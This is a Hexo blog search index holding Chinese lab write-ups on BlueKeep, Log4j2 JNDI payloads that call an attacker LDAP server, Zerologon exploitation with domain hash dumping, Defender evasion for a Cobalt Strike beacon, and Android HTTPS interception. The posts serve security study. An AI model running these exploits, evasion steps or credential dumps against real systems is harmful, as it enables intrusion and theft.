search.xml

<?xml version="1.0" encoding="utf-8"?>
<search>
  <entry>
    <title>0708 - CVE-2019-0708 复现</title>
    <url>/2019/10/12/0708-CVE-2019-0708-%E5%A4%8D%E7%8E%B0/</url>
    <content><![CDATA[<h2 id="0x01-准备环境"><a class="header-anchor" href="#0x01-准备环境">¶</a>0x01 准备环境</h2>
<p>2019年9月7日晚上凌晨1点，github上发布了0708的漏洞利用程序，看了别人的复现和讨论，感觉不太好用，懒得复现，这两天闲了，复现出来发发博客，好久没发了，主要是没啥新东西可以发，不方便发</p>
<h3 id="下载攻击套件"><a class="header-anchor" href="#下载攻击套件">¶</a>下载攻击套件</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb</span><br></pre></td></tr></tbody></table></figure>
<p>拷贝到<code>metasploit</code>对应目录下，我这里是<code>kali</code>自带的目录</p>
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">0708</span>, <span class="label success">msf</span></p></div>
<span id="more"></span>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">cp</span> rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/</span><br><span class="line"><span class="built_in">cp</span> rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/</span><br><span class="line"><span class="built_in">cp</span> cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/rdp/</span><br><span class="line"><span class="built_in">cp</span> cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp</span><br></pre></td></tr></tbody></table></figure>
<h3 id="更新msf"><a class="header-anchor" href="#更新msf">¶</a>更新msf</h3>
<p>我是使用<code>kali2.0 1902</code>版本的<code>msf</code>，先更新，记得使用<code>proxychains</code>，不然怎么都更新失败哦</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">gedit /etc/proxychains.conf</span><br><span class="line">proxychains /bin/bash</span><br><span class="line">apt update; apt install metasploit-framework</span><br></pre></td></tr></tbody></table></figure>
<h2 id="0x02-配置"><a class="header-anchor" href="#0x02-配置">¶</a>0x02 配置</h2>
<p>启动<code>msf</code>，重载<code>0708</code>利用模块</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">reload_all</span><br></pre></td></tr></tbody></table></figure>
<p>重载完成<code>search</code>一下，找到刚才添加的，并开始利用</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">search 0708</span><br><span class="line">use exploit/rdp/cve_2019_0708_bluekeep_rce</span><br><span class="line">show options</span><br></pre></td></tr></tbody></table></figure>
<p><img src="search.png" alt="search"></p>
<p>看到选项，只有俩需要设置，<code>RHOSTS</code>、<code>target</code></p>
<blockquote>
<ul>
<li>RHOSTS: 目标地址</li>
<li>target: 可选为0-4，设置受害机机器架构</li>
</ul>
</blockquote>
<h2 id="0x03-exploit"><a class="header-anchor" href="#0x03-exploit">¶</a>0x03 exploit</h2>
<p>目标机器为<code>win7 专业版</code>，尝试5个<code>target</code></p>
<p><img src="target_0.png" alt="search"><br>
<img src="target_1.png" alt="target_1"><br>
<img src="target_2.png" alt="target_2"><br>
<img src="target_3.png" alt="target_3"><br>
<img src="target_4.png" alt="target_4"></p>
<p>从<code>options</code>中的<code>target</code>可以清楚看到<code>0-4</code>各个对应什么，很有针对性，反正是各种虚拟机，呵呵<br>
结果可想而知，基本上都是蓝屏</p>
<p><img src="blue.png" alt="blue"></p>
<p>根据瞎子老哥的复现，我决定更换旗舰版试试，试了一遍还是蓝屏，看到他说<code>配置设置成2核2g</code>，我改成如下图配置</p>
<p><img src="config.png" alt="config"></p>
<p><code>0-4</code>再次尝试一遍，在<code>target=3</code>时，成功弹回</p>
<p><img src="success.png" alt="success"></p>
<h2 id="0x04-总结"><a class="header-anchor" href="#0x04-总结">¶</a>0x04 总结</h2>
<p>食之无味，弃之可惜，纯属鸡肋，看到<code>target</code>针对那么多都是虚拟机就知道</p>
<p>从<code>0708</code>消息出来到<code>exp</code>经过3个月左右时间吧，却只拿到这么个鸡肋<code>exp</code>，令人唏嘘，看看后期是否有好用的吧</p>
<p>另外，<code>2008</code>听说还要修改注册表才能成功？黑人问号？？？债见，浪费绳命的东西就不折腾了</p>
<h2 id="0x05-参考链接"><a class="header-anchor" href="#0x05-参考链接">¶</a>0x05 参考链接</h2>
<p><a href="https://www.t00ls.net/viewthread.php?tid=52701&amp;highlight=0708">https://www.t00ls.net/viewthread.php?tid=52701&amp;highlight=0708</a></p>
]]></content>
      <tags>
        <tag>CVE</tag>
        <tag>复现</tag>
        <tag>msf</tag>
      </tags>
  </entry>
  <entry>
    <title>Apache - Log4j2 RCE复现</title>
    <url>/2021/12/11/Apache-Log4j2-RCE%E5%A4%8D%E7%8E%B0/</url>
    <content><![CDATA[<img src="/2021/12/11/Apache-Log4j2-RCE%E5%A4%8D%E7%8E%B0/icloud.png" class="">
<h2 id="环境搭建"><a class="header-anchor" href="#环境搭建">¶</a>环境搭建</h2>
<p>使用<code>T00ls</code>大佬的环境，<code>war</code>包放到<code>webapps</code>下重启<code>tomcat</code>即可</p>
<div class="note info"><p>阅读本篇文章能了解到：apache, rce，Log4j2</p></div>
<span id="more"></span>
<blockquote>
<p><a href="https://www.t00ls.cc/viewthread.php?tid=63695&amp;extra=&amp;page=1">https://www.t00ls.cc/viewthread.php?tid=63695&amp;extra=&amp;page=1</a></p>
</blockquote>
<p>这里我要多说几句，因为我用的<code>jspstudy</code>，搭建环境踩了不少坑，记录下，主要是<code>jspstudy</code>的坑</p>
<p>首先把<code>war</code>包放到<code>webapps</code>下并不会自解压，放到<code>www</code>一样不解压</p>
<p>解决方案：<code>JspStudy\tomcat\conf</code>文件夹下<code>server.xml</code>，注释掉<code>&lt;Context docBase="D:\JspStudy\WWW\" path=""&gt;&lt;/Context&gt;</code>，放到<code>webapps</code>即可自解压</p>
<p>设置根目录为<code>D:\JspStudy\WWW\ROOT</code>，访问<code>http://127.0.0.1:8080</code>，页面正常</p>
<p>提交<code>payload</code>，报500错</p>
<p><img src="500.png" alt="500"></p>
<p>经查，大概是<code>jdk</code>版本问题，打开<code>jdk</code>目录查看<code>java</code>版本为<code>1.7.0_60</code>，盲猜版本过低</p>
<p>解决方案：安装<code>jre1.8</code>32位，拷贝<code>bin</code>、<code>lib</code>目录，替换<code>JspStudy\JDK\jre\</code>，替换前先把<code>bin</code>目录下<code>java-JspStudy.exe</code>备份一份，替换后再拷贝进去</p>
<p>重启<code>tomcat</code>解决500错误，8错，nice，我已经准备不再用他了😅</p>
<h2 id="RCE"><a class="header-anchor" href="#RCE">¶</a>RCE</h2>
<h3 id="1-dnslog"><a class="header-anchor" href="#1-dnslog">¶</a>1. dnslog</h3>
<p>先使用dns测试漏洞</p>
<blockquote>
<p>payload: ${jndi:ldap://redn3ck.xxx.ceye.io}</p>
</blockquote>
<p><img src="dns.png" alt="dns"></p>
<h3 id="2-rce"><a class="header-anchor" href="#2-rce">¶</a>2. rce</h3>
<p>下载<a href="https://github.com/0x727/JNDIExploit">https://github.com/0x727/JNDIExploit</a>，跑起服务</p>
<p><img src="JNDIExploit.png" alt="JNDIExploit"></p>
<blockquote>
<p>payload: ${jndi:ldap://207.xxx.xxx.111:1389/TomcatBypass/TomcatEcho}</p>
</blockquote>
<p><code>header</code>中填入<code>Cmd: cmd</code>即可<code>rce</code></p>
<p><img src="rce.png" alt="rce"></p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<blockquote>
<p><a href="https://www.t00ls.cc/viewthread.php?tid=63695">https://www.t00ls.cc/viewthread.php?tid=63695</a><br>
<a href="https://www.t00ls.cc/viewthread.php?tid=63705">https://www.t00ls.cc/viewthread.php?tid=63705</a></p>
</blockquote>
]]></content>
      <tags>
        <tag>复现</tag>
        <tag>apache</tag>
        <tag>rce</tag>
        <tag>Log4j2</tag>
      </tags>
  </entry>
  <entry>
    <title>Apk抓包 - 抓不到解决方案</title>
    <url>/2022/11/02/Apk%E6%8A%93%E5%8C%85-%E6%8A%93%E4%B8%8D%E5%88%B0%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88/</url>
    <content><![CDATA[<h2 id="0x01-前言"><a class="header-anchor" href="#0x01-前言">¶</a>0x01 前言</h2>
<p>很多 <code>apk</code> 设置代理后，抓包都会出现没有包的情况，一部分原因就是使用 <code>so</code> 文件 <code>https</code></p>
<p>经过大佬的一通研究后，用了意想不到的解决方案突破了该问题，高，实在是高，学习并记录</p>
<h2 id="0x02-解决方案"><a class="header-anchor" href="#0x02-解决方案">¶</a>0x02 解决方案</h2>
<p>正常抓包，模拟器配置好代理和 <code>fiddler</code> ，我这用的夜神，<code>magisk+LSP+justTrustme</code> 后开始按照正常流程抓包，可见无任何流量</p>
<h3 id="1-查找域名"><a class="header-anchor" href="#1-查找域名">¶</a>1. 查找域名</h3>
<p><code>winrar</code> 解包 <code>apk</code> ，使用 <code>npp</code> 搜索相关域名，搜出3处 <code>so</code> 文件，在其中搜索 <code>https</code> 包含大量请求</p>
<span id="more"></span>
<p><img src="npp.png" alt="npp"></p>
<h3 id="2-替换https"><a class="header-anchor" href="#2-替换https">¶</a>2. 替换https</h3>
<p>使用如下 <code>py</code> 代码替换 <code>https</code> 为 <code>http</code>，替换上述3个文件</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">t = <span class="built_in">open</span>(<span class="string">r'libapp.so'</span>, <span class="string">'rb'</span>).read()</span><br><span class="line">t = re.sub(<span class="string">b'https://([\d\w\.]*?)/'</span>,<span class="string">b'http://\\1//'</span>,t)</span><br><span class="line"><span class="built_in">open</span>(<span class="string">'libapp.so'</span>,<span class="string">'wb'</span>).write(t)</span><br></pre></td></tr></tbody></table></figure>
<h3 id="3-替换so文件"><a class="header-anchor" href="#3-替换so文件">¶</a>3. 替换so文件</h3>
<p>将更改的<code>so</code>文件替换到<code>app</code>对应系统目录下，如果有就替换，没有就直接放入</p>
<blockquote>
<p>/data/app/[app 名]/</p>
</blockquote>
<p><img src="mt.png" alt="mt"></p>
<h3 id="4-抓包"><a class="header-anchor" href="#4-抓包">¶</a>4. 抓包</h3>
<p>打开app，查看<code>proxifier</code>走向可看到<code>ip</code>走向已从<code>443</code>变为<code>80</code>，证明so文件加载成功</p>
<p><img src="80.png" alt="80"></p>
<p><code>proxifier</code>添加<code>http</code>规则，使该<code>ip</code>代理到fiddler</p>
<p><img src="rules.png" alt="rules"></p>
<h3 id="5-替换http"><a class="header-anchor" href="#5-替换http">¶</a>5. 替换http</h3>
<p><code>ctrl+r</code>打开 <code>fiddler</code> 脚本，在<code>OnBeforeRequest</code>函数内添加如下代码，即为把<code>http</code>请求更改为<code>https</code></p>
<figure class="highlight c++"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">// https2http</span></span><br><span class="line"><span class="keyword">if</span>(oSession.oRequest.headers.UriScheme == <span class="string">"http"</span> &amp;&amp; oSession.PathAndQuery.<span class="built_in">IndexOf</span>(<span class="string">"/"</span>) &gt;= <span class="number">0</span>){</span><br><span class="line">	<span class="keyword">while</span>(oSession.PathAndQuery.<span class="built_in">StartsWith</span>(<span class="string">"//"</span>)) {</span><br><span class="line">		oSession.PathAndQuery = oSession.PathAndQuery.<span class="built_in">Replace</span>(<span class="string">"//"</span>,<span class="string">"/"</span>)</span><br><span class="line">	}</span><br><span class="line">	oSession[<span class="string">"ui-backcolor"</span>] = <span class="string">"#999bdd"</span>;</span><br><span class="line">	oSession.oRequest.headers.UriScheme = <span class="string">"https"</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>fiddler即可正常抓包</p>
<p><img src="fiddler.png" alt="fiddler"></p>
<h2 id="0x03-总结"><a class="header-anchor" href="#0x03-总结">¶</a>0x03 总结</h2>
<p>该方案将<code>https</code>替换成<code>http</code>，没了证书自然抓得到包，最后再通过fiddler替换回去，实现app的正常运行，属于奇技淫巧了</p>
<p>只要功夫深，铁杵磨成针，大佬yyds</p>
<p>最后贴一个大佬被自己思路折服的画面，无敌！🙌</p>
<p><img src="wechat.png" alt="wechat"></p>
]]></content>
      <tags>
        <tag>apk</tag>
        <tag>抓包</tag>
        <tag>模拟器</tag>
        <tag>so</tag>
      </tags>
  </entry>
  <entry>
    <title>CS免杀 - bypass defender</title>
    <url>/2022/08/09/CS%E5%85%8D%E6%9D%80-bypass-defender/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>最近看到一款过 <code>defender</code> 的免杀工具，挺感兴趣，之所以感兴趣的原因是我觉得目前最强的杀软就是<code>defender</code></p>
<p>外面有很多过火绒、360之类的，不感兴趣，因为用武之地不大，而且自带的 <code>defender</code> 更强力，过 <code>defender</code> 的意义更大</p>
<p><strong>X系列安全工具-AV免杀框架-BypassAV</strong></p>
<blockquote>
<p><a href="https://github.com/XTeam-Wing/X-AV">https://github.com/XTeam-Wing/X-AV</a></p>
</blockquote>
<p>具体介绍就不赘述了，看 <code>README</code> 就好</p>
<h2 id="安装"><a class="header-anchor" href="#安装">¶</a>安装</h2>
<p>现在 <code>go</code> 日趋火热，不学点真的跟不上了，这款工具也是 <code>go</code> 开发的</p>
<span id="more"></span>
<h3 id="go"><a class="header-anchor" href="#go">¶</a>go</h3>
<p>不赘述，我这里安装的是新版 <code>go1.18.3</code>，所以导致跑他的程序有很多问题，但又不想降级，所以就一步步排查，解决问题，死磕</p>
<h3 id="run"><a class="header-anchor" href="#run">¶</a>run</h3>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ShellcodeFrameWork_windows_amd64.exe -shellcodepath mimikatz.exe -o rc4.exe -key wing -encrypt  rc4 -loadermethod uuid</span><br></pre></td></tr></tbody></table></figure>
<p>直接跑提示 <code>ERROR:exec: "bin/go": file does not exist</code></p>
<p>看来环境变量没写好，所以把程序放到 <code>go</code> 目录 <code>C:\Program Files\Go</code> 再次运行，提示 <code>STDERR: UUID_agent.go:33:2: cannot find package "github.com/google/uuid" in any of:</code></p>
<p>使用 <code>go get github.com/google/uuid </code> 报错，按提示改为 <code>go install github.com/google/uuid@latest</code> 报错 <code>package github.com/google/uuid is not a main package</code> ，查了一圈折腾了很久</p>
<p><strong>解决方案</strong></p>
<p>在目录 <code>C:\Program Files\Go\src\</code> 下手动创建 <code>github.com/google/</code> ，之后 <code>git clone https://github.com/google/uuid.git</code>，解决该问题</p>
<p>剩下的报错同理解决</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">C:\Program Files\Go\src\golang.org\x&gt;git clone https://github.com/golang/crypto.git</span><br><span class="line">C:\Program Files\Go\src\golang.org\x&gt;git clone https://github.com/golang/sys.git</span><br></pre></td></tr></tbody></table></figure>
<p>至此，程序跑起来，解决高版本 <code>go</code> 运行问题</p>
<h2 id="免杀效果"><a class="header-anchor" href="#免杀效果">¶</a>免杀效果</h2>
<p>一开始我免杀<code>mmk</code>，但跑不起来，才发现该工具为 <code>shellcode</code> 免杀 😅</p>
<p>生成一个 <code>Windows stageless Raw</code> 用 <code>aes</code> 加密一个试试看免杀效果</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">C:\Program Files\Go&gt;x-av.exe -shellcodepath C:\Users\admin\Desktop\beacon.bin -key redn3ck -encrypt aes -loadermethod uuid -salt wakuwaku -o aes.exe</span><br></pre></td></tr></tbody></table></figure>
<p>我直接放到主机测试，主机是一直在更新的 <code>win10</code>， <code>defender</code> 也是最新的</p>
<p><img src="defender.png" alt="defender"></p>
<p>本身程序没报毒没什么，跑起来后也没报，<code>defender</code> 阵亡，免杀效果不错，另外贴上系统版本为 <code>19044.1826</code></p>
<p><img src="systeminfo.png" alt="systeminfo"></p>
<p><code>CS</code> 成功上线</p>
<p><img src="cs.png" alt="cs"></p>
<h3 id="抓密码"><a class="header-anchor" href="#抓密码">¶</a>抓密码</h3>
<p>大胆测试一下抓密码，猜测不可以，结果没想到成功抓到密码</p>
<p><img src="hashdump.png" alt="hashdump"></p>
<p>但可惜的是这次 <code>defender</code> 复活了，检测到恶意程序，并且弹窗强制<code>1min</code>后关机，我不理解 但我大受震撼.jpg</p>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<p>该工具免杀效果不错，相信过了 <code>defender</code>，其他 <code>AV</code> 也不必测试了</p>
<p>只要不做一些敏感行为，还是可以达到一定效果</p>
]]></content>
      <tags>
        <tag>cs</tag>
        <tag>免杀</tag>
        <tag>defender</tag>
      </tags>
  </entry>
  <entry>
    <title>CVE-2017-11882 POC</title>
    <url>/2017/11/21/CVE-2017-11882-POC/</url>
    <content><![CDATA[<h1>POC</h1>
<p><a href="https://github.com/embedi/CVE-2017-11882">https://github.com/embedi/CVE-2017-11882</a></p>
<p>如何使用，作者github里写的很清楚</p>
<p>附上自测gif</p>
<img src="/2017/11/21/CVE-2017-11882-POC/exp.gif" class="">
<h1>BTW</h1>
<p>现在此漏洞被冠上全版本通杀的名号，作者也放出3个版本的视频，但我本地测试，却在2016下未成功</p>
<p>具体环境：win10 [10.0.16299.64] + 破解激活过的office2016</p>
]]></content>
      <tags>
        <tag>CVE</tag>
      </tags>
  </entry>
  <entry>
    <title>CVE-2020-1472 - Zerologon复现+突破445</title>
    <url>/2020/10/16/CVE-2020-1472-Zerologon%E5%A4%8D%E7%8E%B0+%E7%AA%81%E7%A0%B4445/</url>
    <content><![CDATA[<h2 id="0x01-前言"><a class="header-anchor" href="#0x01-前言">¶</a>0x01 前言</h2>
<p>如此好用的漏洞，怎么能没有我？没有实际环境，就用本地复现8，跨起个小猫脸.jpg</p>
<h2 id="0x02-工具准备"><a class="header-anchor" href="#0x02-工具准备">¶</a>0x02 工具准备</h2>
<p>下载如下工具</p>
<blockquote>
<p><a href="https://github.com/risksense/zerologon">https://github.com/risksense/zerologon</a><br>
<a href="https://github.com/SecureAuthCorp/impacket">https://github.com/SecureAuthCorp/impacket</a><br>
<a href="https://github.com/gentilkiwi/mimikatz/releases">https://github.com/gentilkiwi/mimikatz/releases</a></p>
</blockquote>
<p>python3安装最新版impacket</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> impacket-master</span><br><span class="line">pip3 install .</span><br></pre></td></tr></tbody></table></figure>
<h2 id="0x03-复现"><a class="header-anchor" href="#0x03-复现">¶</a>0x03 复现</h2>
<div class="note info"><p>阅读本篇文章能了解到：Zerologon, 域渗透</p></div>
<span id="more"></span>
<p>俩工具，具体啥区别等下说</p>
<h3 id="py"><a class="header-anchor" href="#py">¶</a>py</h3>
<ol>
<li>exploit</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">cve-<span class="number">2020</span>-<span class="number">1472</span>-exploit.py WIN-<span class="number">4</span>MRAELMUJKS <span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">118</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="py_exploit.png" alt="py_exploit"></p>
<p>此攻击已将<code>域控</code>机器用户密码置空，即<code>31d6cfe0d16ae931b73c59d7e0c089c0</code></p>
<ol start="2">
<li>dumpHash</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">python3 secretsdump.py -no-pass -just-dc red.com/WIN-<span class="number">4</span>MRAELMUJKS$@<span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">118</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="py_dumpHash.png" alt="py_dumpHash"></p>
<figure class="highlight cmd"><figcaption><span>仅dump administrator hash</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">python3 secretsdump.py red.com/WIN-<span class="number">4</span>MRAELMUJKS$@WIN-<span class="number">4</span>MRAELMUJKS -dc-ip <span class="number">192</span>.<span class="number">168</span>.<span class="number">2</span>.<span class="number">118</span> -just-dc-user red\administrator -hashes <span class="number">31</span>d6cfe0d16ae931b73c59d7e0c089c0:<span class="number">31</span>d6cfe0d16ae931b73c59d7e0c089c0</span><br></pre></td></tr></tbody></table></figure>
<p><img src="py_dumpAdminHash.png" alt="py_dumpAdminHash"></p>
<ol start="3">
<li>执行命令</li>
</ol>
<figure class="highlight python"><figcaption><span>atexec.py</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">Python3 atexec.py -hashes :7ecfffxxxx548187607a14bad0f88bb1 red/administrator@<span class="number">192.168</span><span class="number">.2</span><span class="number">.118</span> <span class="string">"ipconfig"</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="cmd_atexec.png" alt="cmd_atexec"></p>
<figure class="highlight python"><figcaption><span>wmiexec</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">Python3 wmiexec.py red.com/administrator@<span class="number">192.168</span><span class="number">.2</span><span class="number">.118</span> -hashes :7ecfffxxxx548187607a14bad0f88bb1</span><br></pre></td></tr></tbody></table></figure>
<p><img src="cmd_wmiexec.png" alt="cmd_wmiexec"></p>
<ol start="3">
<li>restore</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">reg save HKLM\SYSTEM system.save</span><br><span class="line">reg save HKLM\SAM sam.save</span><br><span class="line">reg save HKLM\SECURITY security.save</span><br><span class="line">get system.save</span><br><span class="line">get sam.save</span><br><span class="line">get security.save</span><br><span class="line"><span class="built_in">del</span> system.save</span><br><span class="line"><span class="built_in">del</span> sam.save</span><br><span class="line"><span class="built_in">del</span> security.save</span><br></pre></td></tr></tbody></table></figure>
<p><img src="cmd_regOut.png" alt="cmd_regOut"></p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">Python3 secretsdump.py -sam sam.save -system system.save -security security.save local</span><br></pre></td></tr></tbody></table></figure>
<p><img src="cmd_regDumpHash.png" alt="cmd_regDumpHash"></p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">python3 restorepassword.py red.com/WIN-4MRAELMUJKS@WIN-4MRAELMUJKS -target-ip <span class="number">192.168</span><span class="number">.2</span><span class="number">.118</span> -hexpass 81e29601938c978794d6df7a8d1e7b2d6a8f3f6364eaee355ce49bd8cd2a061051a10ba0492c17fca257ef856ce91f63242d63e6700186fc16d40b873e01b91886279f6c9744e46e7ece0bec87e9ce1d3c857805f5f56b54728807e94e5b904450661b518a7bb7798d8b7f9e8f909b674c216f6bbd1810bfe75150254ebb37e3f1785547bace30c84772ae86dacadeb89a7660ad41740214ffc6d68fee6eb069d916f35172c1c56f8c424c3aef6a316c14f92ad5b8ff76f22e1e3c5dc4f3dda4f4ee984ec94dd5d05396914a790a2061afe063bb8f60dad3ff44886b043d5f1e7c8b9e51ad2b1c7391e142a6e9111add</span><br></pre></td></tr></tbody></table></figure>
<p><img src="py_restore.png" alt="py_restore.png"></p>
<h3 id="mimikatz"><a class="header-anchor" href="#mimikatz">¶</a>mimikatz</h3>
<ol>
<li>POC</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function">lsadump::<span class="title">zerologon</span> /<span class="title">target:WIN</span>-4<span class="title">MRAELMUJKS</span> /<span class="title">account:WIN</span>-4<span class="title">MRAELMUJKS</span>$</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="mimikatz_poc.png" alt="mimikatz_poc.png"></p>
<ol start="2">
<li>exploit</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function">lsadump::<span class="title">zerologon</span> /<span class="title">target:WIN</span>-4<span class="title">MRAELMUJKS</span> /<span class="title">account:WIN</span>-4<span class="title">MRAELMUJKS</span>$ /<span class="title">exploit</span></span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="mimikatz_exploit.png" alt="mimikatz_exploit.png"></p>
<ol start="3">
<li>dumpHash</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function">lsadump::<span class="title">dcsync</span> /<span class="title">domain:red</span>.<span class="title">com</span> /<span class="title">dc:WIN</span>-4<span class="title">MRAELMUJKS</span> /<span class="title">user:administrator</span> /<span class="title">authuser:WIN</span>-4<span class="title">MRAELMUJKS</span>$ /<span class="title">authdomain:red</span> /<span class="title">authpassword</span>:"" /<span class="title">authntlm</span></span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="mimikatz_dumpHash.png" alt="mimikatz_dumpHash.png"></p>
<ol start="4">
<li>restore</li>
</ol>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function">lsadump::<span class="title">postzerologon</span> /<span class="title">target:red</span>.<span class="title">com</span> /<span class="title">account:WIN</span>-4<span class="title">MRAELMUJKS</span>$</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="mimikatz_restore.png" alt="mimikatz_restore.png"></p>
<p>恢复失败，不知原因，恢复还是用上面的方法吧</p>
<h2 id="0x04-总结"><a class="header-anchor" href="#0x04-总结">¶</a>0x04 总结</h2>
<p><img src="mimikatz_RPC.png" alt="mimikatz_RPC.png"></p>
<p>作者说使用<code>direct RPC</code>，即<code>rpc</code>协议，135端口。而<code>py</code>既需要<code>smb</code>协议也需要<code>RPC</code>，即445和135</p>
<p>查看网络连接可看到区别</p>
<p><img src="py_port.png" alt="py_port.png"></p>
<p><img src="mimikatz_port.png" alt="mimikatz_port.png"></p>
<p><code>py</code>依赖445，所以445被禁了就用<code>mimikatz</code>吧</p>
<h2 id="0x05-参考资料"><a class="header-anchor" href="#0x05-参考资料">¶</a>0x05 参考资料</h2>
<p><a href="https://www.anquanke.com/post/id/219374">https://www.anquanke.com/post/id/219374</a><br>
<a href="https://www.t00ls.net/viewthread.php?tid=58268">https://www.t00ls.net/viewthread.php?tid=58268</a></p>
]]></content>
      <tags>
        <tag>CVE</tag>
        <tag>复现</tag>
        <tag>域渗透</tag>
      </tags>
  </entry>
  <entry>
    <title>CVE-2021-1675 - printSpooler复现</title>
    <url>/2021/07/28/CVE-2021-1675-printSpooler%E5%A4%8D%E7%8E%B0/</url>
    <content><![CDATA[<h2 id="漏洞简介"><a class="header-anchor" href="#漏洞简介">¶</a>漏洞简介</h2>
<h3 id="CVE-2021-1675"><a class="header-anchor" href="#CVE-2021-1675">¶</a>CVE-2021-1675</h3>
<p>Print Spooler是Windows系统中管理打印事务的服务，用于管理所有本地和网络打印队列并控制所有打印工作。Windows系统默认开启该服务，攻击者可绕过RPCAddPrintDriver的身份验证，直接在打印服务器中安装恶意驱动程序。普通用户可以利用此漏洞提升至管理员权限。在域环境下，域用户可以远程利用该漏洞以SYSTEM权限在域控制器上执行任意代码，从而获得整个域的控制权。</p>
<h3 id="CVE-2021-34527"><a class="header-anchor" href="#CVE-2021-34527">¶</a>CVE-2021-34527</h3>
<p>34527的漏洞原理与1675一致，但因为github上发布的EXP可以绕过微软在6月安全补丁更新中发布的1675的修复程序。所以在7月2日，微软官方针对公开的EXP发布了CVE-2021-34527的漏洞公告，并提供临时解决方案，但目前暂未发布修复补丁，此漏洞仍处于0day状态。</p>
<h3 id="漏洞时间线"><a class="header-anchor" href="#漏洞时间线">¶</a>漏洞时间线</h3>
<p>2021-06-09 微软发布月度安全补丁：通告定义CVE-2021-1675为本地提权漏洞<br>
2021-06-21 微软更新通告：将CVE-2021-1675改为远程代码执行漏洞<br>
2021-07-02 微软紧急发布CVE-2021-34527通告（未发布补丁）</p>
<h3 id="影响版本"><a class="header-anchor" href="#影响版本">¶</a>影响版本</h3>
<div class="note info"><p>阅读本篇文章能了解到：printSpooler, 2008, 2012, RCE</p></div>
<span id="more"></span>
<p>Windows Server 2012 R2 (Server Core installation)<br>
Windows Server 2012 R2<br>
Windows Server 2012 (Server Core installation)<br>
Windows Server 2012<br>
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>
Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>
Windows Server 2008 for x64-based Systems Service Pack 2<br>
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>
Windows Server 2008 for 32-bit Systems Service Pack 2<br>
Windows RT 8.1<br>
Windows 8.1 for x64-based systems<br>
Windows 8.1 for 32-bit systems<br>
Windows 7 for x64-based Systems Service Pack 1<br>
Windows 7 for 32-bit Systems Service Pack 1<br>
Windows Server 2016  (Server Core installation)<br>
Windows Server 2016<br>
Windows 10 Version 1607 for x64-based Systems<br>
Windows 10 Version 1607 for 32-bit Systems<br>
Windows 10 for x64-based Systems<br>
Windows 10 for 32-bit Systems<br>
